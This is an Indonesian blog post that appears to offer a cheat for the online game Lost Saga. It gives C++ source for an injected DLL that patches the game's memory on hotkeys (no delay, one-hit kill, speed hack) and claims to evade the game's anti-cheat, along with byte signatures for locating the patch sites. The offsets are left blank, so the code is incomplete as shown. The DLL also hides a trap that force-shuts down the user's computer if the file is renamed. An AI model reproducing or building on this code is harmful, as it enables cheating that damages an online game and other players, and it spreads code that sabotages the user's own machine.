Rabu, 26 Juni 2013

Cara membuat Cheat LS





Alat :

  • Video tutorial
  • source code lost saga permanent
  • AOB permanent
  • DEV C++ Work di WS 2000/XP
Caranya dah ada di Video nya Gan
dan dengerin aja ada suara dimas syahputra

liat videonya : Disini kalo mau di Download pake IDM Bluid 6.15 ada di google

Source code lost saga permanent :


//===================================//
 //Name : Base LostSaga Fullhacks
 //Created : Hasan'sCommunity
 //Thank'z : ALL Admin Faceinteraction Teamz
 //Notice  : Dilarang di sebar !
 //===================================//

 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>
 #include <stdio.h>
 #include <stdlib.h>

 //============ OFFSET ============
 #define NoDelay 0x
 #define OneHitCSD 0x
 #define FallDamage 0x
 #define SpeedHack 0x
 //============ OFFSET ============


 LPTSTR ModulGame = "lostsaga.exe";



 void Patch(void *adr, void *ptr, int size)

 {

 DWORD OldProtection;

 VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection);

 memcpy(adr,ptr,size);

 VirtualProtect(adr,size,OldProtection, &OldProtection);

 }

 void WritePointer(unsigned long ulBase, int iOffset, int iValue)

 {

 if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long)))

 {

 if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long)))

 {

 *(int*)(*(unsigned long*)ulBase + iOffset) = iValue;

 }

 }

 }



 void SagaHacy()

 {



 while(1)
 {

 //========== No Delay ==========//
 if (GetAsyncKeyState(VK_F1)&1) {
 MessageBeep(MB_ICONINFORMATION);
 DWORD adrMin1, adrMin2 = 0;
 DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
 if (dwPB > 0) {
 adrMin1 = dwPB + (DWORD)NoDelay;
 Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3); // Jangan di ganti Agar WORK
 }

 }
 //========== 1 Hit Crusade ==========//
 if (GetAsyncKeyState(VK_F2)&1) {
 MessageBeep(MB_ICONINFORMATION);
 DWORD adrMin1, adrMin2 = 0;
 DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
 if (dwPB > 0) {
 adrMin1 = dwPB + (DWORD)OneHitCSD;
 Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK
 }

 }

 //========== Fall Damage UP ==========//
 if (GetAsyncKeyState(VK_F3)&1) {
 MessageBeep(MB_ICONINFORMATION);
 DWORD adrMin1, adrMin2 = 0;
 DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
 if (dwPB > 0) {
 adrMin1 = dwPB + (DWORD)FallDamage;
 Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK
 }

 }

 //========== SpeedHack Hook ==========//
 if (GetAsyncKeyState(VK_F4)&1) {
 MessageBeep(MB_ICONINFORMATION);
 DWORD adrMin1, adrMin2 = 0;
 DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
 if (dwPB > 0) {
 adrMin1 = dwPB + (DWORD)SpeedHack;
 Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK
 }

 }

 Sleep(100); //Jangan di ganti , Agar Tembus GG Cowboy



 }



 }

 BOOL APIENTRY DllMain(HINSTANCE hDll, DWORD callReason, LPVOID lpReserved) {

 DisableThreadLibraryCalls(hDll);

 if(callReason == DLL_PROCESS_ATTACH) {

 MessageBox(0, "Credit by Dimas Syahputra\n\nThank'z to : ALL Admin Prohacy.Net Teamz", "Notice",MB_ICONINFORMATION | MB_OKCANCEL); // Notice yg Keluar
 MessageBox(0, "No Delay : F1\n1 Hit Crusade : F2\nFall Damage UP : F3\nSpeedHack Hook : F4\n\nTekan Saat Splash Cowboy Menghilang / Saat Mulai Splash Screen Hitam", "Just Work to OS Win 7",MB_ICONWARNING | MB_OKCANCEL); // Notice yg Keluar
 CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&SagaHacy,0, 0, 0);



 char strDLLName [_MAX_PATH];

 GetModuleFileName(hDll, strDLLName , _MAX_PATH);

 if (strstr(strDLLName, "Prohacy.dll") <= 0) {//Nama DLL Asli

 // tampilkan pesan, kalo dll nya sdh bukan asli / sudah di rename

 MessageBox(0, "Ente Leacher ?","Deteckor",MB_ICONSTOP | MB_OK);
 MessageBox(0, "Udah dikasih kok rename ?","Deteckor",MB_ICONSTOP | MB_OK);
 MessageBox(0, "Dadah !\nKompimu aku Restart ya :*","Deteckor",MB_ICONSTOP | MB_OK);
 system("start C:/Windows/System32/shutdown.exe -s -f -t 00");
 ExitProcess(0);//ERROR

 }



 }


 }



AOB Lost Saga Permanent :
  •  No Delay : 4F 6E 50 75 73 68 53 74 72 75 63 74 44 65 6C 61 79
  •  1 Hit Crusade : 4D 41 58 5F 48 50 5F 55 50
  •  Fall Damage UP : 53 54 52 5F 44 41 4D 41 47 45 5F 55 50
  •  Move Speed UP : 4D 4F 56 45 5F 53 50 45 45 44 5F 55 50
Download DEV C++ : Disini

Download Cheat Engine 5.6.1 : Disini